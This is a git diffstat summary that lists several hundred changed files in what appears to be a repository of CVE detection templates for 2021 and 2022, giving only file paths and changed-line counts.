http/cves/2021/CVE-2021-22054.yaml | 4 ++-- http/cves/2021/CVE-2021-22122.yaml | 5 ++-- http/cves/2021/CVE-2021-22145.yaml | 5 ++-- http/cves/2021/CVE-2021-22205.yaml | 2 ++ http/cves/2021/CVE-2021-22214.yaml | 4 +++- http/cves/2021/CVE-2021-22707.yaml | 5 ++-- http/cves/2021/CVE-2021-22873.yaml | 4 +++- http/cves/2021/CVE-2021-22911.yaml | 2 ++ http/cves/2021/CVE-2021-22986.yaml | 3 +++ http/cves/2021/CVE-2021-24145.yaml | 6 ++--- http/cves/2021/CVE-2021-24165.yaml | 3 +++ http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 3 +-- http/cves/2021/CVE-2021-24215.yaml | 6 +++-- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 3 +-- http/cves/2021/CVE-2021-24275.yaml | 3 +++ http/cves/2021/CVE-2021-24276.yaml | 5 +++- http/cves/2021/CVE-2021-24278.yaml | 4 ++-- http/cves/2021/CVE-2021-24285.yaml | 6 +++-- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 6 +++-- http/cves/2021/CVE-2021-24291.yaml | 3 +++ http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 5 ++-- http/cves/2021/CVE-2021-24340.yaml | 8 +++++-- http/cves/2021/CVE-2021-24347.yaml | 5 ++-- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 6 +++-- http/cves/2021/CVE-2021-24435.yaml | 4 ++-- http/cves/2021/CVE-2021-24442.yaml | 6 +++-- http/cves/2021/CVE-2021-24472.yaml | 2 ++ http/cves/2021/CVE-2021-24495.yaml | 4 ++-- http/cves/2021/CVE-2021-24498.yaml | 4 ++-- http/cves/2021/CVE-2021-24510.yaml | 4 ++-- http/cves/2021/CVE-2021-24554.yaml | 4 ++-- http/cves/2021/CVE-2021-24627.yaml | 6 +++-- http/cves/2021/CVE-2021-24647.yaml | 4 ++-- http/cves/2021/CVE-2021-24731.yaml | 4 ++-- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 4 ++-- http/cves/2021/CVE-2021-24838.yaml | 4 +++- http/cves/2021/CVE-2021-24849.yaml | 4 +++- http/cves/2021/CVE-2021-24862.yaml | 4 ++-- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 4 ++-- http/cves/2021/CVE-2021-24915.yaml | 6 +++-- http/cves/2021/CVE-2021-24917.yaml | 6 +++-- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 6 +++-- http/cves/2021/CVE-2021-24946.yaml | 4 ++-- http/cves/2021/CVE-2021-24947.yaml | 4 ++-- http/cves/2021/CVE-2021-24970.yaml | 5 ++-- http/cves/2021/CVE-2021-24979.yaml | 3 +++ http/cves/2021/CVE-2021-25003.yaml | 4 ++-- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 ++ http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 4 +++- http/cves/2021/CVE-2021-25065.yaml | 4 +++- http/cves/2021/CVE-2021-25067.yaml | 4 +++- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 7 ++++-- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 6 +++-- http/cves/2021/CVE-2021-25297.yaml | 6 +++-- http/cves/2021/CVE-2021-25298.yaml | 2 ++ http/cves/2021/CVE-2021-25299.yaml | 6 +++-- http/cves/2021/CVE-2021-25646.yaml | 4 ++-- http/cves/2021/CVE-2021-25864.yaml | 4 +++- http/cves/2021/CVE-2021-25899.yaml | 1 + http/cves/2021/CVE-2021-26084.yaml | 5 ++-- http/cves/2021/CVE-2021-26085.yaml | 6 +++-- http/cves/2021/CVE-2021-26086.yaml | 4 ++-- http/cves/2021/CVE-2021-26247.yaml | 5 +++- http/cves/2021/CVE-2021-26294.yaml | 4 ++-- http/cves/2021/CVE-2021-26295.yaml | 1 + http/cves/2021/CVE-2021-26598.yaml | 5 ++-- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 4 ++-- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 4 +++- http/cves/2021/CVE-2021-26855.yaml | 2 ++ http/cves/2021/CVE-2021-27124.yaml | 4 ++-- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 4 ++-- http/cves/2021/CVE-2021-27319.yaml | 4 ++-- http/cves/2021/CVE-2021-27320.yaml | 4 ++-- http/cves/2021/CVE-2021-27330.yaml | 2 ++ http/cves/2021/CVE-2021-27358.yaml | 2 ++ http/cves/2021/CVE-2021-27519.yaml | 3 ++- http/cves/2021/CVE-2021-27520.yaml | 3 ++- http/cves/2021/CVE-2021-27561.yaml | 6 +++-- http/cves/2021/CVE-2021-27651.yaml | 4 ++-- http/cves/2021/CVE-2021-27670.yaml | 2 ++ http/cves/2021/CVE-2021-27850.yaml | 3 ++- http/cves/2021/CVE-2021-27905.yaml | 3 +++ http/cves/2021/CVE-2021-27909.yaml | 6 +++-- http/cves/2021/CVE-2021-27931.yaml | 6 +++-- http/cves/2021/CVE-2021-28150.yaml | 4 +++- http/cves/2021/CVE-2021-28164.yaml | 5 ++-- http/cves/2021/CVE-2021-28169.yaml | 5 ++-- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 4 ++-- http/cves/2021/CVE-2021-28937.yaml | 10 ++++---- http/cves/2021/CVE-2021-29006.yaml | 2 ++ http/cves/2021/CVE-2021-29156.yaml | 6 +++-- http/cves/2021/CVE-2021-29200.yaml | 4 ++-- http/cves/2021/CVE-2021-29203.yaml | 4 ++-- http/cves/2021/CVE-2021-29442.yaml | 4 ++-- http/cves/2021/CVE-2021-29484.yaml | 1 + http/cves/2021/CVE-2021-29490.yaml | 4 +++- http/cves/2021/CVE-2021-29622.yaml | 5 ++-- http/cves/2021/CVE-2021-29625.yaml | 4 ++++ http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 6 +++-- http/cves/2021/CVE-2021-30128.yaml | 5 ++-- http/cves/2021/CVE-2021-30134.yaml | 5 ++-- http/cves/2021/CVE-2021-30151.yaml | 6 +++-- http/cves/2021/CVE-2021-3017.yaml | 8 +++---- http/cves/2021/CVE-2021-30175.yaml | 5 ++-- http/cves/2021/CVE-2021-3019.yaml | 4 ++-- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 8 +++++-- http/cves/2021/CVE-2021-30497.yaml | 4 ++-- http/cves/2021/CVE-2021-3110.yaml | 3 ++- http/cves/2021/CVE-2021-31195.yaml | 2 ++ http/cves/2021/CVE-2021-31250.yaml | 4 ++-- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 8 ++++--- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 4 ++-- http/cves/2021/CVE-2021-31682.yaml | 5 ++-- http/cves/2021/CVE-2021-31755.yaml | 4 ++-- http/cves/2021/CVE-2021-31805.yaml | 3 +++ http/cves/2021/CVE-2021-31862.yaml | 2 ++ http/cves/2021/CVE-2021-3223.yaml | 1 + http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 4 ++-- http/cves/2021/CVE-2021-32853.yaml | 2 ++ http/cves/2021/CVE-2021-3297.yaml | 4 ++-- http/cves/2021/CVE-2021-33044.yaml | 5 ++-- http/cves/2021/CVE-2021-33221.yaml | 4 ++-- http/cves/2021/CVE-2021-33357.yaml | 6 +++-- http/cves/2021/CVE-2021-33690.yaml | 1 + http/cves/2021/CVE-2021-3374.yaml | 4 +++- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 4 ++-- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 1 + http/cves/2021/CVE-2021-34473.yaml | 3 +++ http/cves/2021/CVE-2021-34640.yaml | 5 ++-- http/cves/2021/CVE-2021-34643.yaml | 4 ++-- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 5 ++-- http/cves/2021/CVE-2021-35336.yaml | 8 +++---- http/cves/2021/CVE-2021-35395.yaml | 5 ++-- http/cves/2021/CVE-2021-35464.yaml | 6 +++-- http/cves/2021/CVE-2021-35488.yaml | 3 ++- http/cves/2021/CVE-2021-35587.yaml | 1 + http/cves/2021/CVE-2021-3577.yaml | 6 +++-- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 4 ++-- http/cves/2021/CVE-2021-36380.yaml | 8 ++++--- http/cves/2021/CVE-2021-36450.yaml | 2 ++ http/cves/2021/CVE-2021-3654.yaml | 4 ++-- http/cves/2021/CVE-2021-36580.yaml | 4 +++- http/cves/2021/CVE-2021-36748.yaml | 4 ++-- http/cves/2021/CVE-2021-37304.yaml | 3 ++- http/cves/2021/CVE-2021-37305.yaml | 1 + http/cves/2021/CVE-2021-37416.yaml | 6 +++-- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 5 ++-- http/cves/2021/CVE-2021-37589.yaml | 6 +++-- http/cves/2021/CVE-2021-37704.yaml | 4 ++-- http/cves/2021/CVE-2021-37833.yaml | 7 ++++-- http/cves/2021/CVE-2021-38540.yaml | 6 +++-- http/cves/2021/CVE-2021-38702.yaml | 5 ++-- http/cves/2021/CVE-2021-38704.yaml | 6 +++-- http/cves/2021/CVE-2021-39165.yaml | 5 ++-- http/cves/2021/CVE-2021-39211.yaml | 7 ++++-- http/cves/2021/CVE-2021-39226.yaml | 2 ++ http/cves/2021/CVE-2021-39320.yaml | 4 ++-- http/cves/2021/CVE-2021-39433.yaml | 4 ++-- http/cves/2021/CVE-2021-39501.yaml | 1 + http/cves/2021/CVE-2021-40149.yaml | 2 ++ http/cves/2021/CVE-2021-40150.yaml | 2 ++ http/cves/2021/CVE-2021-40323.yaml | 7 ++++-- http/cves/2021/CVE-2021-40438.yaml | 5 ++-- http/cves/2021/CVE-2021-40539.yaml | 7 ++++-- http/cves/2021/CVE-2021-40542.yaml | 6 +++-- http/cves/2021/CVE-2021-40651.yaml | 7 +++++- http/cves/2021/CVE-2021-40822.yaml | 1 + http/cves/2021/CVE-2021-40868.yaml | 4 ++-- http/cves/2021/CVE-2021-40870.yaml | 8 ++++--- http/cves/2021/CVE-2021-40875.yaml | 1 + http/cves/2021/CVE-2021-40908.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 6 +++-- http/cves/2021/CVE-2021-40969.yaml | 2 ++ http/cves/2021/CVE-2021-40970.yaml | 2 ++ http/cves/2021/CVE-2021-40971.yaml | 2 ++ http/cves/2021/CVE-2021-40972.yaml | 2 ++ http/cves/2021/CVE-2021-40973.yaml | 2 ++ http/cves/2021/CVE-2021-40978.yaml | 4 ++-- http/cves/2021/CVE-2021-41174.yaml | 6 +++-- http/cves/2021/CVE-2021-41192.yaml | 6 +++-- http/cves/2021/CVE-2021-41277.yaml | 5 ++-- http/cves/2021/CVE-2021-41282.yaml | 3 +++ http/cves/2021/CVE-2021-41291.yaml | 5 ++-- http/cves/2021/CVE-2021-41293.yaml | 4 ++-- http/cves/2021/CVE-2021-41349.yaml | 3 +++ http/cves/2021/CVE-2021-41432.yaml | 3 ++- http/cves/2021/CVE-2021-41467.yaml | 6 +++-- http/cves/2021/CVE-2021-41649.yaml | 6 +++-- http/cves/2021/CVE-2021-41749.yaml | 4 ++-- http/cves/2021/CVE-2021-4191.yaml | 3 +++ http/cves/2021/CVE-2021-41951.yaml | 4 ++-- http/cves/2021/CVE-2021-42013.yaml | 1 + http/cves/2021/CVE-2021-42063.yaml | 1 + http/cves/2021/CVE-2021-42237.yaml | 2 ++ http/cves/2021/CVE-2021-42565.yaml | 4 ++-- http/cves/2021/CVE-2021-42566.yaml | 4 ++-- http/cves/2021/CVE-2021-42567.yaml | 4 +++- http/cves/2021/CVE-2021-42627.yaml | 8 +++---- http/cves/2021/CVE-2021-42887.yaml | 4 +++- http/cves/2021/CVE-2021-43062.yaml | 3 +++ http/cves/2021/CVE-2021-43287.yaml | 2 ++ http/cves/2021/CVE-2021-43421.yaml | 4 ++-- http/cves/2021/CVE-2021-43496.yaml | 7 ++++-- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 3 ++- http/cves/2021/CVE-2021-43725.yaml | 2 ++ http/cves/2021/CVE-2021-43734.yaml | 5 ++-- http/cves/2021/CVE-2021-43778.yaml | 4 ++-- http/cves/2021/CVE-2021-43798.yaml | 2 ++ http/cves/2021/CVE-2021-43810.yaml | 4 ++-- http/cves/2021/CVE-2021-44077.yaml | 3 +++ http/cves/2021/CVE-2021-44138.yaml | 1 + http/cves/2021/CVE-2021-44139.yaml | 2 ++ http/cves/2021/CVE-2021-44152.yaml | 1 + http/cves/2021/CVE-2021-44228.yaml | 4 ++-- http/cves/2021/CVE-2021-44427.yaml | 4 ++-- http/cves/2021/CVE-2021-44451.yaml | 7 ++++-- http/cves/2021/CVE-2021-44515.yaml | 3 +++ http/cves/2021/CVE-2021-44528.yaml | 1 + http/cves/2021/CVE-2021-44529.yaml | 8 ++++--- http/cves/2021/CVE-2021-44848.yaml | 3 +++ http/cves/2021/CVE-2021-45043.yaml | 4 +++- http/cves/2021/CVE-2021-45046.yaml | 5 ++-- http/cves/2021/CVE-2021-45092.yaml | 5 +++- http/cves/2021/CVE-2021-45232.yaml | 4 ++-- http/cves/2021/CVE-2021-45380.yaml | 3 ++- http/cves/2021/CVE-2021-45422.yaml | 2 ++ http/cves/2021/CVE-2021-45428.yaml | 8 +++---- http/cves/2021/CVE-2021-45968.yaml | 4 ++-- http/cves/2021/CVE-2021-46005.yaml | 6 ++++- http/cves/2021/CVE-2021-46069.yaml | 5 ++-- http/cves/2021/CVE-2021-46071.yaml | 5 ++-- http/cves/2021/CVE-2021-46072.yaml | 4 ++-- http/cves/2021/CVE-2021-46107.yaml | 1 + http/cves/2021/CVE-2021-46381.yaml | 8 +++---- http/cves/2021/CVE-2021-46387.yaml | 6 +++-- http/cves/2021/CVE-2021-46417.yaml | 5 ++-- http/cves/2021/CVE-2021-46418.yaml | 9 ++++---- http/cves/2021/CVE-2021-46419.yaml | 6 ++--- http/cves/2021/CVE-2021-46422.yaml | 8 +++---- http/cves/2021/CVE-2021-46424.yaml | 1 + http/cves/2021/CVE-2021-46704.yaml | 1 + http/cves/2022/CVE-2022-0087.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 3 ++- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 ++ http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 4 +++- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 5 +++- http/cves/2022/CVE-2022-0281.yaml | 1 + http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 3 ++- http/cves/2022/CVE-2022-0415.yaml | 9 ++++++-- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0424.yaml | 2 ++ http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 4 ++-- http/cves/2022/CVE-2022-0533.yaml | 4 +++- http/cves/2022/CVE-2022-0597.yaml | 3 ++- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 7 ++++-- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 5 ++-- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 ++ http/cves/2022/CVE-2022-0678.yaml | 3 ++- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 4 ++-- http/cves/2022/CVE-2022-0735.yaml | 4 +++- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 4 ++-- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 4 ++-- http/cves/2022/CVE-2022-0786.yaml | 4 ++-- http/cves/2022/CVE-2022-0787.yaml | 4 ++-- http/cves/2022/CVE-2022-0814.yaml | 2 ++ http/cves/2022/CVE-2022-0817.yaml | 4 ++-- http/cves/2022/CVE-2022-0824.yaml | 3 +++ http/cves/2022/CVE-2022-0826.yaml | 5 ++-- http/cves/2022/CVE-2022-0827.yaml | 4 ++-- http/cves/2022/CVE-2022-0846.yaml | 4 ++-- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 3 +++ http/cves/2022/CVE-2022-0899.yaml | 1 + http/cves/2022/CVE-2022-0928.yaml | 6 ++++- http/cves/2022/CVE-2022-0949.yaml | 4 ++-- http/cves/2022/CVE-2022-0954.yaml | 4 +++- http/cves/2022/CVE-2022-0963.yaml | 4 +++- http/cves/2022/CVE-2022-0968.yaml | 2 ++ http/cves/2022/CVE-2022-1007.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 4 ++-- http/cves/2022/CVE-2022-1040.yaml | 2 ++ http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 4 ++-- http/cves/2022/CVE-2022-1058.yaml | 2 ++ http/cves/2022/CVE-2022-1119.yaml | 4 ++-- http/cves/2022/CVE-2022-1162.yaml | 2 ++ http/cves/2022/CVE-2022-1170.yaml | 2 ++ http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 6 ++--- http/cves/2022/CVE-2022-1386.yaml | 4 ++-- http/cves/2022/CVE-2022-1388.yaml | 2 ++ http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 6 +++-- http/cves/2022/CVE-2022-1439.yaml | 3 ++- http/cves/2022/CVE-2022-1442.yaml | 4 ++-- http/cves/2022/CVE-2022-1574.yaml | 4 ++-- http/cves/2022/CVE-2022-1580.yaml | 5 ++-- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 6 +++-- http/cves/2022/CVE-2022-1756.yaml | 2 ++ http/cves/2022/CVE-2022-1768.yaml | 4 ++-- http/cves/2022/CVE-2022-1815.yaml | 3 +++ http/cves/2022/CVE-2022-1903.yaml | 4 ++-- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 6 +++-- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 3 +++ http/cves/2022/CVE-2022-21500.yaml | 2 ++ http/cves/2022/CVE-2022-21587.yaml | 7 ++++-- http/cves/2022/CVE-2022-21661.yaml | 5 ++-- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 1 + http/cves/2022/CVE-2022-2185.yaml | 2 ++ http/cves/2022/CVE-2022-2187.yaml | 4 ++-- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 6 +++-- http/cves/2022/CVE-2022-22536.yaml | 5 ++-- http/cves/2022/CVE-2022-22733.yaml | 5 ++-- http/cves/2022/CVE-2022-2290.yaml | 2 ++ http/cves/2022/CVE-2022-22947.yaml | 4 ++-- http/cves/2022/CVE-2022-22954.yaml | 1 + http/cves/2022/CVE-2022-22972.yaml | 6 +++-- http/cves/2022/CVE-2022-23102.yaml | 2 ++ http/cves/2022/CVE-2022-23131.yaml | 6 +++-- http/cves/2022/CVE-2022-23134.yaml | 7 ++++-- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 5 ++-- http/cves/2022/CVE-2022-23348.yaml | 1 + http/cves/2022/CVE-2022-23544.yaml | 4 ++-- http/cves/2022/CVE-2022-2376.yaml | 4 ++-- http/cves/2022/CVE-2022-23779.yaml | 2 ++ http/cves/2022/CVE-2022-23808.yaml | 7 ++++-- http/cves/2022/CVE-2022-2383.yaml | 7 +++--- http/cves/2022/CVE-2022-23854.yaml | 1 + http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 5 ++-- http/cves/2022/CVE-2022-24124.yaml | 6 +++-- http/cves/2022/CVE-2022-2414.yaml | 1 + http/cves/2022/CVE-2022-24181.yaml | 1 + http/cves/2022/CVE-2022-24260.yaml | 6 +++-- http/cves/2022/CVE-2022-24264.yaml | 4 ++-- http/cves/2022/CVE-2022-24266.yaml | 4 ++-- http/cves/2022/CVE-2022-24288.yaml | 2 ++ http/cves/2022/CVE-2022-24384.yaml | 3 ++- http/cves/2022/CVE-2022-24627.yaml | 3 ++- http/cves/2022/CVE-2022-24681.yaml | 3 +++ http/cves/2022/CVE-2022-24716.yaml | 2 ++ http/cves/2022/CVE-2022-24856.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 6 ++--- http/cves/2022/CVE-2022-2487.yaml | 2 ++ http/cves/2022/CVE-2022-2488.yaml | 2 ++ http/cves/2022/CVE-2022-24899.yaml | 2 ++ http/cves/2022/CVE-2022-24900.yaml | 3 ++- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 3 +++ http/cves/2022/CVE-2022-25149.yaml | 7 ++++-- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 3 ++- http/cves/2022/CVE-2022-2535.yaml | 2 ++ http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 4 +++- http/cves/2022/CVE-2022-25487.yaml | 5 ++-- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 4 ++-- http/cves/2022/CVE-2022-25568.yaml | 7 ++++-- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 3 ++- http/cves/2022/CVE-2022-26138.yaml | 4 ++-- http/cves/2022/CVE-2022-26148.yaml | 1 + http/cves/2022/CVE-2022-26233.yaml | 5 ++-- http/cves/2022/CVE-2022-2627.yaml | 6 +++-- http/cves/2022/CVE-2022-26352.yaml | 7 ++++-- http/cves/2022/CVE-2022-26564.yaml | 4 +++- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 4 ++-- http/cves/2022/CVE-2022-2733.yaml | 2 ++ http/cves/2022/CVE-2022-2756.yaml | 2 ++ http/cves/2022/CVE-2022-27593.yaml | 2 ++ http/cves/2022/CVE-2022-27926.yaml | 7 ++++-- http/cves/2022/CVE-2022-28023.yaml | 4 ++-- http/cves/2022/CVE-2022-28032.yaml | 4 ++-- http/cves/2022/CVE-2022-28079.yaml | 4 ++-- http/cves/2022/CVE-2022-28080.yaml | 4 ++-- http/cves/2022/CVE-2022-28117.yaml | 5 ++-- http/cves/2022/CVE-2022-28219.yaml | 6 +++-- http/cves/2022/CVE-2022-28363.yaml | 7 ++++-- http/cves/2022/CVE-2022-28365.yaml | 7 ++++-- http/cves/2022/CVE-2022-2863.yaml | 4 ++-- http/cves/2022/CVE-2022-28955.yaml | 1 + http/cves/2022/CVE-2022-29004.yaml | 4 ++-- http/cves/2022/CVE-2022-29005.yaml | 4 ++-- http/cves/2022/CVE-2022-29006.yaml | 4 ++-- http/cves/2022/CVE-2022-29007.yaml | 4 ++-- http/cves/2022/CVE-2022-29009.yaml | 4 ++-- http/cves/2022/CVE-2022-29013.yaml | 8 +++---- http/cves/2022/CVE-2022-29014.yaml | 4 ++-- http/cves/2022/CVE-2022-29078.yaml | 4 ++-- http/cves/2022/CVE-2022-29153.yaml | 2 ++ http/cves/2022/CVE-2022-29272.yaml | 3 +++ http/cves/2022/CVE-2022-29298.yaml | 1 + http/cves/2022/CVE-2022-29303.yaml | 1 + http/cves/2022/CVE-2022-29349.yaml | 5 ++-- http/cves/2022/CVE-2022-29464.yaml | 2 ++ http/cves/2022/CVE-2022-29548.yaml | 6 +++-- http/cves/2022/CVE-2022-29775.yaml | 5 ++-- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 8 +++++-- http/cves/2022/CVE-2022-30512.yaml | 4 ++-- http/cves/2022/CVE-2022-30513.yaml | 4 ++-- http/cves/2022/CVE-2022-30525.yaml | 4 ++-- http/cves/2022/CVE-2022-3062.yaml | 4 ++-- http/cves/2022/CVE-2022-30776.yaml | 1 + http/cves/2022/CVE-2022-30777.yaml | 5 +++- http/cves/2022/CVE-2022-31126.yaml | 1 + http/cves/2022/CVE-2022-31268.yaml | 2 ++ http/cves/2022/CVE-2022-31269.yaml | 6 +++-- http/cves/2022/CVE-2022-31373.yaml | 3 ++- http/cves/2022/CVE-2022-3142.yaml | 2 ++ http/cves/2022/CVE-2022-31499.yaml | 2 ++ http/cves/2022/CVE-2022-31656.yaml | 5 ++-- http/cves/2022/CVE-2022-31798.yaml | 4 +++- http/cves/2022/CVE-2022-31814.yaml | 4 ++-- http/cves/2022/CVE-2022-31845.yaml | 2 ++ http/cves/2022/CVE-2022-31846.yaml | 2 ++ http/cves/2022/CVE-2022-31847.yaml | 7 ++++-- http/cves/2022/CVE-2022-31854.yaml | 4 ++-- http/cves/2022/CVE-2022-31879.yaml | 4 ++-- http/cves/2022/CVE-2022-31976.yaml | 4 ++-- http/cves/2022/CVE-2022-31977.yaml | 4 ++-- http/cves/2022/CVE-2022-31981.yaml | 4 ++-- http/cves/2022/CVE-2022-31983.yaml | 6 +++-- http/cves/2022/CVE-2022-31984.yaml | 4 ++-- http/cves/2022/CVE-2022-32015.yaml | 4 ++-- http/cves/2022/CVE-2022-32018.yaml | 4 ++-- http/cves/2022/CVE-2022-32022.yaml | 1 + http/cves/2022/CVE-2022-32024.yaml | 1 + http/cves/2022/CVE-2022-32025.yaml | 1 + http/cves/2022/CVE-2022-32026.yaml | 1 + http/cves/2022/CVE-2022-32028.yaml | 1 + http/cves/2022/CVE-2022-32094.yaml | 5 ++-- http/cves/2022/CVE-2022-32195.yaml | 3 ++- http/cves/2022/CVE-2022-32409.yaml | 3 ++- http/cves/2022/CVE-2022-3242.yaml | 5 ++-- http/cves/2022/CVE-2022-32429.yaml | 4 ++-- http/cves/2022/CVE-2022-32430.yaml | 1 + http/cves/2022/CVE-2022-32444.yaml | 6 +++-- http/cves/2022/CVE-2022-32770.yaml | 7 ++++-- http/cves/2022/CVE-2022-32771.yaml | 3 ++- http/cves/2022/CVE-2022-32772.yaml | 7 ++++-- http/cves/2022/CVE-2022-33119.yaml | 5 ++-- http/cves/2022/CVE-2022-33174.yaml | 1 + http/cves/2022/CVE-2022-33891.yaml | 6 +++-- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 6 +++-- http/cves/2022/CVE-2022-34045.yaml | 4 +++- http/cves/2022/CVE-2022-34046.yaml | 4 +++- http/cves/2022/CVE-2022-34047.yaml | 2 ++ http/cves/2022/CVE-2022-34048.yaml | 2 ++ http/cves/2022/CVE-2022-34049.yaml | 2 ++ http/cves/2022/CVE-2022-34093.yaml | 6 +++-- http/cves/2022/CVE-2022-34094.yaml | 6 +++-- http/cves/2022/CVE-2022-34121.yaml | 4 ++-- http/cves/2022/CVE-2022-34328.yaml | 3 ++- http/cves/2022/CVE-2022-34576.yaml | 4 +++- http/cves/2022/CVE-2022-34590.yaml | 5 ++-- http/cves/2022/CVE-2022-34753.yaml | 1 + http/cves/2022/CVE-2022-35151.yaml | 1 + http/cves/2022/CVE-2022-35405.yaml | 2 ++ http/cves/2022/CVE-2022-35413.yaml | 2 ++ 